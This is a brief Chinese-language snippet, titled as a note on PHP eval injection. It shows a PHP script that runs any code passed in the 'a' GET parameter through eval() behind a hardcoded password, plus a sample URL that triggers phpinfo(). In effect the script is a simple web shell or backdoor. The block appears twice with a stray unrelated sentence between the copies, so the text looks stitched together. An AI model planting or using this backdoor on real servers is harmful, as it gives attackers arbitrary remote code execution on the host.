php eval 的漏洞潜在注入
http://url/test.php?pwd=admin&action=eval&a=phpinfo();
$passwd="admin";
if($_GET['pwd']!=$passwd) exit;
if($_GET['action']=="eval" && $_GET['a']){
eval($_GET['a']);
}
exit;
其实我一直在你身边
http://url/test.php?pwd=admin&action=eval&a=phpinfo();
$passwd="admin";
if($_GET['pwd']!=$passwd) exit;
if($_GET['action']=="eval" && $_GET['a']){
eval($_GET['a']);
}
exit;